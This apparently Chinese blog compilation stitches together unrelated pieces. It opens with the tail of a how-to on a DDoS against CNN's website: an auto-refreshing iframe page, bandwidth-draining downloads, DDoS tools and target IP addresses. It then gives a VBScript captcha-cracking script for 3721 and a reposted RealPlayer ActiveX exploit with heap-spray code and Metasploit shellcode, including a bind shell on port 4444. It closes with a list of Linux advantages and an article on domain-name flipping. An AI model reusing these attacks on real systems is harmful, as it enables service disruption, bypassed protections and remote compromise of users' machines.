　　解释：在网页中嵌入一个框架，每隔3000毫秒打开CNN的网站。不用人工参与，也不影响正常工作。
　　另外，有些网友做好了攻击网页，以链接的形式在论坛或者QQ群等地方发布出来，大家只需点击即可。比如：
　　http://www.test.com/cnn.htm
　　其cnn.htm页面的核心代码也就是上面的网页脚本代码。(图3)
　　
　　4.下载攻击
　　登陆CNN网站的“http://edition.cnn.com/video/”页面，看到看到类似的链接
　　java script:cnnVideo(’play’, ‘/video/politics/2006/03/01/henry.port.politics.wed.cnn’)
　　只用把文件的头和尾改一下即可。最后下载文件的地址是
　　mms: //wmscnn.stream.aol.com/cnn/politics/2006/03/01/henry.port.politics.wed.cnn.ws.wmv
　　随便用一下可以下mms格式的工具把它下下来即可。
　　或者是类似这样的链接，用下载工具下载
　　http://i.cdn.turner.com/cnn/.element/js/2.0/video/xmp/FlashMediaPlayer_0_1_524_1663.swf
　　视频下载肯定会占用大量的带宽，从而造成网络的拥堵。
　　5.工具攻击
　　利用类似上兴网络僵尸这样的DDOS工具，组织大量的主机进行集中的攻击。这些工具的操作非常简单，只需要输入攻击的IP和端口(本例中的80)即可。网友也公布了CNN的一些动态IP地址。(图4)
　　
　　****.236.29.120、61.236.16.52、61.236.16.20 、61.236.91.24 、61.236.91.23、61.236.91.22
　　61.236.91.21 、61.236.29.120 、61.236.24.12 、61.236.22.112
　　二、攻击效果
　　这两天的攻击效果比较明显，CNN的网站一度无法浏览，如图5所示。来自CNN官方的消息称：CNN网站遭到攻击，浏览其新闻网页受到干扰，导致亚洲部分地区的网速变慢很多。(图5)
　　
　　由于CNN采取了动态IP和负载均衡技术，这一轮的攻击只是造成了亚洲地区的访问堵塞，其他地方仍然可以访问。因此，预计新一轮的攻击会通过国外代理，然后实施攻击。
来源：http://security.ctocio.com.cn/tips/273/8093773.shtml

‘———————–
‘针对3721的图片认证码的识别
‘3721网址:http://customer.3721.com/newapply/newwhois.htm
‘netdust
‘2005-8-20
‘———————–

Option Explicit

‘要识别的图片名称
Dim picName
picName = “1.bmp”

‘数字对照表，识别图片时就是把从图片提取的与该数组比较，相同的便是该数字
Dim NumAry(9)
NumAry(0)=”00011000001111000110011011000011110000111100001111000011011001100011110000011000″
NumAry(1)=”00011000001110000111100000011000000110000001100000011000000110000001100001111110″
NumAry(2)=”00111100011001101100001100000011000001100000110000011000001100000110000011111111″
NumAry(3)=”01111100110001100000001100000110000111000000011000000011000000111100011001111100″
NumAry(4)=”00000110000011100001111000110110011001101100011011111111000001100000011000000110″
NumAry(5)=”11111110110000001100000011011100111001100000001100000011110000110110011000111100″
NumAry(6)=”00111100011001101100001011000000110111001110011011000011110000110110011000111100″
NumAry(7)=”11111111000000110000001100000110000011000001100000110000011000001100000011000000″
NumAry(8)=”00111100011001101100001101100110001111000110011011000011110000110110011000111100″
NumAry(9)=”00111100011001101100001111000011011001110011101100000011010000110110011000111100″

Dim st,dataOff,imgW,imgH,imgWBytes,unitW,unitH
Set st = Wscript.createobject(”ADODB.Stream”)
st.Type = 1
st.Mode = 3
st.open()
‘加载图片二进制流，并读取图片头信息
st.LoadFromFile(picName)
st.position = 10
‘获取数据偏移
dataOff = BinVal(st.read(4))
st.read(4)
‘图片宽、高（象素）
imgW = BinVal(st.read(4))
imgH = BinVal(st.read(4))
imgWBytes = imgW
‘每个数字的宽、高（象素）
unitW = 8
unitH = 10

Dim i,ii,tmp,validCode
‘循环获取五个数字
For i=0 To 4
 ’获取某数字的特征，并与对照表进行比较，找到对应的则记录，否则以*号标识
 ’3188是第一个数字的左上角的数据偏移，每向后一个则偏移增加 unitW+1
 tmp = getBound(3188+(unitW+1)*i)
 For ii=0 To 9
  If tmp = NumAry(ii) Then
   validCode = validCode & ii
   Exit For
  End If
 Next
 If Len(validCode) = i Then validCode = validCode & “*”
Next

‘关闭
st.Close()
Set st = Nothing

‘程序完成
MsgBox(”验证码是：”&validCode)
‘———-

‘获取指定矩形区域的特征码
‘bp:矩形左上角的偏移 unitW:矩形宽 unitH:矩形高
‘按照矩形图形从左到右、从上到下的方向进行提取，如该点二进制为1则表示为1，否则为0
Function getBound(bp)
 Dim str,i,ii
 st.Position = bp
 For i=1 To unitH
  For ii=1 To unitW
   If AscB(st.Read(1)) = 1 Then
    str = str & “1″
   Else
    str = str & “0″
   End If
  Next
  st.Position = bp - i*imgWBytes
 Next
 getBound = str
End Function

‘将2进制转化为数字
Function BinVal(bin)
 dim ret
 ret = 0
 for i = lenb(bin) to 1 step -1
  ret = ret *256 + ascb(midb(bin,i,1))
 next
 BinVal=ret
End Function

Rem 将字符转换成2进制数组的函数
‘ ASCIIToByteArray converts ASCII strings to a byte array
‘ a byte array is different from an array of bytes, some things require
‘ a byte array, such as writing to the ADODB stream. This function
‘ utilises the ADODB ability to convert to byte arrays from dual digit HEX strings…
function ASCIIToByteArray(sText)
 Dim objRS
 Dim lTemp
 Dim sTemp

 sTemp = “”

 ’ Convert the string to dual digit zero padded hex,
 ’ there ain’t no quick way of doing this… Would be interested to hear
 ’ if anyone do this quicker…
 For lTemp = 1 to LenB(sText)
  sTemp = sTemp & Right(”00″ & Hex(AscB(MidB(sText,lTemp,1))),2)
 Next

 ’ Ok, this may look a little weird, but trust me, this works…
 ’ Open us a recordset
 set objRS = WScript.CreateObject(”ADODB.Recordset”)

 ’ Add a fields to the current recordset, add the hex string
 objRS.Fields.Append “Temp”,204,LenB(sText)+1
 objRS.Open
 objRS.AddNew
 objRS(”Temp”) = sTemp ‘ ADODB will convert here
 objRS.Update
 objRS.MoveFirst

 ASCIIToByteArray = objRS(”Temp”) ‘ A variant byte array is returned

 objRS.Close

 set objRS = Nothing
end function

 

ReadMe:

每个数字的尺寸
宽度：8px
高度：10px

第一个字的左上角是22行11列（偏移量3188）
第一个字的左下角是13行11列（偏移量2288）

数字对应表：
0:00011000001111000110011011000011110000111100001111000011011001100011110000011000
1:00011000001110000111100000011000000110000001100000011000000110000001100001111110
2:00111100011001101100001100000011000001100000110000011000001100000110000011111111
3:01111100110001100000001100000110000111000000011000000011000000111100011001111100
4:00000110000011100001111000110110011001101100011011111111000001100000011000000110
5:11111110110000001100000011011100111001100000001100000011110000110110011000111100
6:00111100011001101100001011000000110111001110011011000011110000110110011000111100
7:11111111000000110000001100000110000011000001100000110000011000001100000011000000
8:00111100011001101100001101100110001111000110011011000011110000110110011000111100
9:00111100011001101100001111000011011001110011101100000011010000110110011000111100

说明：0代表底色，1代表前景色，把某个数字对应的列表按照每8个一行就明白了
如0:
00011000001111000110011011000011110000111100001111000011011001100011110000011000
–>
00011000
00111100
01100110
11000011
11000011
11000011
11000011
01100110
00111100
00011000

请把下面的shellcode解码：转自http://www.milw0rm.com/exploits/5332，这是一个应用RealPlayer组件rmoc3260.dll 漏洞的测试代码【Exploit】，好像是在4月1号由著名的黑客组织milw0rm写的。对高手来说，解码下面的东西可能不屑或者懒得动手，网络上有这样的解码工具，但是我试了号多次还是乱码。我用的是：http://www.cha88.cn/safe/shellcode.php，其实这个程序说的很清楚，他用的是metasploit这款软件，但是这个工具没有汉化版本。

<html>
<head>
  <title>Real Player rmoc3260.dll ActiveX Control Remote Code Execution Exploit</title>
  <script language=”JavaScript” defer>
    function Check() {

// win32_exec -  EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com
var shellcode1 = unescape(”%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949″ +
                          “%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a” +
                          “%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241″ +
                          “%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c” +
                          “%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c” +
                          “%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f” +
                          “%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b” +
                          “%u4e54%u456b%u4a51%u4****e%u6b51%u4f70%u4c69%u6e6c” +
                          “%u59****%u7350%u5344%u5837%u7a41%u546a%u334d%u7831″ +
                          “%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955″ +
                          “%u6e75%u416b%u3****f%u4544%u6a51%u534b%u4c56%u4****b” +
                          “%u726c%u4c6b%u534b%u376f%u636c%u6a31%u4e4b%u756b” +
                          “%u6c4c%u544b%u4841%u4d6b%u5159%u514c%u3434%u4a44″ +
                          “%u3063%u6f31%u6230%u4e44%u716b%u5450%u4b70%u6b35″ +
                          “%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530″ +
                          “%u6e4c%u6c4d%u614b%u5578%u6a58%u****4b%u4e49%u6b6b” +
                          “%u6c30%u5770%u5770%u4770%u4c70%u704b%u4768%u714c” +
                          “%u444f%u6b71%u3346%u6650%u4f36%u4c79%u6e38%u4f63″ +
                          “%u7130%u306b%u4150%u5878%u6c70%u534a%u5134%u334f” +
                          “%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377″ +
                          “%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f” +
                          “%u4147%u4163%u504c%u4273%u3159%u5063%u6574%u7035″ +
                          “%u546d%u6573%u3362%u306c%u4163%u7071%u536c%u6653″ +
                          “%u314e%u7475%u7038%u7765%u4370″);

// win32_bind -  EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com
var shellcode2 = unescape(”%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949″ +
                          “%u4949%u4949%u4949%u4949%u4949%u4937%u5a51%u436a” +
                          “%u3058%u3142%u4150%u6b42%u4141%u4153%u4132%u3241″ +
                          “%u4142%u4230%u5841%u3850%u4241%u7875%u4b69%u724c” +
                          “%u584a%u526b%u4a6d%u4a48%u6b59%u6b4f%u694f%u416f” +
                          “%u4e70%u526b%u744c%u41****%u6e34%u376b%u5535%u4c6c” +
                          “%u714b%u****6c%u6145%u7468%u6a41%u6e4f%u626b%u326f” +
                          “%u6c38%u334b%u376f%u5550%u7851%u316b%u6c59%u504b” +
                          “%u6e34%u466b%u6861%u456e%u6f61%u6c30%u6c59%u6b6c” +
                          “%u3934%u4150%u37****%u6877%u6941%u565a%u636d%u4b31″ +
                          “%u7872%u6c6b%u7534%u566b%u3134%u5734%u5458%u6b35″ +
                          “%u6e55%u336b%u556f%u7474%u7841%u416b%u4c76%u4****b” +
                          “%u626c%u6e6b%u416b%u354f%u5****c%u6861%u666b%u3663″ +
                          “%u6c4c%u6b4b%u7239%u444c%u57****%u616c%u4f71%u4733″ +
                          “%u6b41%u336b%u4c54%u634b%u7073%u6c30%u534b%u****70″ +
                          “%u6c4c%u724b%u4550%u4e4c%u6c4d%u374b%u7530%u7358″ +
                          “%u426e%u4c48%u524e%u466e%u586e%u566c%u3930%u586f” +
                          “%u7156%u4676%u7233%u6346%u3058%u7033%u3332%u5458″ +
                          “%u5237%u4553%u5162%u504f%u4b54%u5a4f%u3370%u6a58″ +
                          “%u686b%u596d%u456c%u466b%u4930%u596f%u7346%u4e6f” +
                          “%u5869%u7365%u4d56%u5851%u366d%u****68%u7242%u7275″ +
                          “%u674a%u5972%u6e6f%u7230%u4a48%u5679%u6b69%u6e45″ +
                          “%u7****d%u6b37%u584f%u3356%u3063%u5053%u7653%u7033″ +
                          “%u3353%u5373%u3763%u5633%u6b33%u5a4f%u3270%u5046″ +
                          “%u3568%u7141%u304c%u3366%u6c63%u6d49%u6a31%u7035″ +
                          “%u6e68%u3544%u524a%u4b50%u7177%u4b47%u4e4f%u3036″ +
                          “%u526a%u3130%u7041%u5955%u6e6f%u3030%u6c68%u4c****” +
                          “%u546d%u796e%u3179%u5947%u596f%u4****6%u6633%u6b35″ +
                          “%u584f%u6350%u4b58%u7355%u4c79%u4146%u6359%u4b67″ +
                          “%u784f%u7656%u5330%u41****%u3344%u7965%u4e6f%u4e30″ +
                          “%u7173%u5878%u6167%u6969%u7156%u6269%u3977%u6a6f” +
                          “%u5176%u4945%u4e6f%u5130%u5376%u715a%u7274%u6246″ +
                          “%u3048%u3063%u6c6d%u5a49%u6345%u625a%u7670%u3139″ +
                          “%u5839%u4e4c%u4d69%u5337%u335a%u4e74%u4b69%u5652″ +
                          “%u4b51%u6c70%u6f33%u495a%u336e%u4472%u6b6d%u374e” +
                          “%u7632%u6e4c%u6c73%u704d%u767a%u6c58%u4e6b%u4c4b” +
                          “%u736b%u5358%u7942%u6d6e%u7463%u6b56%u304f%u7075″ +
                          “%u4b44%u794f%u5346%u706b%u7057%u7152%u5041%u4251″ +
                          “%u4171%u337a%u4231%u4171%u5141%u6****5%u6931%u5a6f” +
                          “%u5070%u6e68%u5a4d%u5679%u6865%u334e%u3963%u586f” +
                          “%u6356%u4b5a%u4b4f%u704f%u4b37%u4a4f%u4c70%u614b” +
                          “%u6b47%u4d4c%u6b53%u3174%u4974%u596f%u7046%u5952″ +
                          “%u4e6f%u6330%u6c58%u6f30%u577a%u6174%u324f%u4b73″ +
                          “%u684f%u3956%u386f%u4350″);


var bigblock = unescape(”%u0C0C%u0C0C”);
var headersize = 20;
var slackspace = headersize + shellcode1.length;
while (bigblock.length < slackspace) bigblock += bigblock;
var fillblock = bigblock.substring(0,slackspace);
var block = bigblock.substring(0,bigblock.length - slackspace);
while (block.length + slackspace < 0×40000) block = block + block + fillblock;



var memory = new Array();
for (i = 0; i < 400; i++){ memory[i] = block + shellcode1 }

var buf = ”;
while (buf.length < 32) buf = buf + unescape(”%0C”);

var m = ”;

m = obj.Console;
obj.Console = buf;
obj.Console = m;

m = obj.Console;
obj.Console = buf;
obj.Console = m;


}
 
   </script>
 
 
</head>
<body onload=”JavaScript: return Check();”>
<object classid=”clsid:2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93″ id=”obj”>
Unable to create object
</object>

</body>
</html>

1。合法升级到最新版本却不花一分钱

2。同一个硬件平台上最新的操作系统却比老的更快。

3。如果你不喜欢默认的桌面环境，可以非常容易的自行安装其他的界面。

4。一个命令就可以安装二十个程序。

5。让系统自动为我所安装的软件更新。

6。可以在N台机器上安装同一份OS拷贝而无须担心协议限制或激活码。

7。可以自由分发该操作系统及其他运行其上的软件而不会违犯法律，政治或伦理道德，因为他本身就提倡这么做的。

8。完全控制我的电脑硬件，并可知晓我的软件中没有什么被政府或者某某公司蓄意安放的秘密后门。

9。可以裸奔（无杀毒软件，反广告／间谍防护软件），以及可以数月不用重启机器，我甚至一直在更新着安全补丁。

10。从来不用磁盘碎片整理。

11。尝试软件，觉得不喜欢，就删掉他，而且知道他不会在什么注册表里留下一些垃圾可能导致把我的系统搞慢。

12。犯了重大错误而导致全新重装系统，也不过花去了1小时不到的时间，因为我把我的数据放在了独立于操作系统和程序的分区。
1
13。在一台3岁的老电脑上可以有如vista那样超酷的登录效果…少于40秒，这已经是将我输入用户名和密码并登录计算在内了。

14。合法自定义任何我想要的东西，包括我最喜爱的程序。我甚至可以跟踪软件开发者并向他们问问题，提意见，如果我愿意的话，也可以参与到真正的软件设计和开发进程中去。

15。超过4个的文字处理窗口，听音乐，玩超酷的桌面效果，联系一个大型的社区，并同时运行着firefox，即时通讯以及email客户端，而不必求爷爷告奶奶的要什么令我的系统可以运作的代码，而不会把系统变慢。

16。使用”dpkg –get-selections > pkg.list”命令来获得一个完整详尽的已装软件列表，备份我的/etc和/home文件夹到一个独立分区，然后你就可以随时恢复你的系统了，而且超简单。

17。同时运行多个桌面，甚至可以让多用户同时登录并使用该机器。

18。无损调整分区大小而不用担心会丢失数据。（译者注：应该是LVM）
 
19。硬件可以使用超过五年而无须更换…我甚至有一些硬件都超过10年的历史了，还依然健在。

20。可以在OS安装的同时浏览网页！

21。使用几乎所有的硬件，因为系统已经自带了驱动…而不必再去硬件供应商的主页上去苦苦搜寻。

22。可以任意获得源代码，包括OS内核以及我的大多数应用程序。

安德鲁•米勒和迈克尔•扎波林同为互联网投资者，他俩都不会讲德语。当两人决定收购一个叫“chocolate.com”的域名时，问题出现了：这个域名的持有者是一位德国人，不会讲英语。他把巧克力公司的广告打在网页上，只要有人点击便可从中渔利。米勒和扎波林透过该网站看到了赚取巨额财富的商机。快人快语的米勒说：“我们知道，没有哪个商家在巧克力网络经营方面出类拔萃。” 他俩说干就干，一面借助留声邮件系统与人联络，一面用英文发送电子邮件讨价还价。几周之后，一位美国律师从亚特兰大打来电话自称代表那个德国卖主。没过几天，米勒和扎波林便以30万美元买下了chocolate.com域名，这笔开支与其他非商标网址域名收购金额相比简直就是沧海一粟。 两年后，这对居住在波士顿的创业搭档在chocolate.com上开办了一个在线巧克力专卖店，既****精选巧克力糖果和巧克力秘制配方，同时也刊登诸如介绍纯黑巧克力营养知识和圣诞巧克力礼品由来的文章。与大型购物商场的业主一样，这一专卖店能否盈利，关键取决于能否吸引稳定的客户。今年以来，chocolate.com的访问量已经翻了一番，有望挣到200万美元。米勒和扎波林断定，网站的身价终将过亿，因此现在如果有任何潜在买主，他们都会拒之门外。 域名买卖 经营域名又让米勒和扎波林打了一场胜仗。他们依靠自己的互联网房地产集团（Internet Real Estate Group）干起倒腾域名的营生，把那些不被看好的域名廉价买进，再将其变为价值连城的无形资产。他们并未让大量点击付费的广告充斥在自己的网站上，也没打算让那些域名马上实现盈利，而是努力促成可以狠赚一把的大买卖。眼下，他们总共拥有17个域名，其中包括software.com和relationship.com。此外，两人手里还有一个严格保密的采购清单，列有若干个域名，只要价格合适，他们就会将其购为己有。 米勒和扎波林原本在波士顿市内一处高档豪华的地方办公，可两人更愿呆在住家附近的布赖翰冰激凌店内。米勒形容自己是个咄咄逼人的家伙，总在寻找下一个发财机会。而扎波林则遇事沉稳，总是试图通过创新来扩大网站的业务规模。二人相识于上世纪80年代末，当时他俩同在德雷克塞尔-布里格姆-兰伯特公司接受销售培训，最终决定联手开发信息技术方面的商机。The Grateful Dead网站曾经是他们的一个客户，受其启发，两人开始涉足域名并购业务并借助www.dead.net 网站获得了商业效益，既在网上卖了东西，又聚拢了一批“粉丝”。 1998年，他们花8万美元把beer.com网站收入囊中，又专门培育了一批客户。具体做法是先向其派发免费邮箱，让其品评各种啤酒。不出一年，他们就以700万美元的天价把网站卖给Interbrew 啤酒公司。2003年两人又如法炮制，用10万美元买下creditcards.com。随后他们推出了一个专业性网站，对各种信用卡进行分析比较，转年又把它卖给一私营股权买主，而当时该网站的售价已涨到280万美元。最近，有人对creditcards.com网站进行资产评估，发现居然已升值至数亿美元。米勒二人也承认出手过早了。 经营域名买卖的核心其实就是域名本身。Chocolate.com 每天可吸引上千人，访问者只要把chocolate 敲入其设在网络浏览器的名址即可自动登录，无须借助 Google之类的搜索网页。大约有1/6的网络搜索者根本不依赖搜索网站，而是选择直航的形式。该域名还具有将在Google搜索网页上的网址位置提前的作用，可排在Hershey誷 和Godiva等著名网址的前面。 鉴于这些有利因素，市场对那些时髦的非商标域名的巨大需求也就在情理之中了。据美国麻省剑桥的域名经纪评估商Sedo 公司披露，2006年，一些被转卖的域名已被炒到7亿美元，比2005年提升了一倍，同时也是2004年的4倍多。 扎波林和米勒已决心要把这个热门产品变成能赚大钱的买卖，他们并不打算卖掉chocolate.com，至少现在还不是时候。过早将creditcards.com脱手这件事仍然令其耿耿于怀，不过他们现已学会一笑了之。“我们不会为丢失‘信用卡’哭天抹泪，因为手上还有好几个值钱货呢，” 扎波林笑道。说这话时，他正坐在布赖翰冰激凌店内，面前摆放着一杯酸橙立克水、一碟花生酱和一份肉冻三明治。

转：三联生活周刊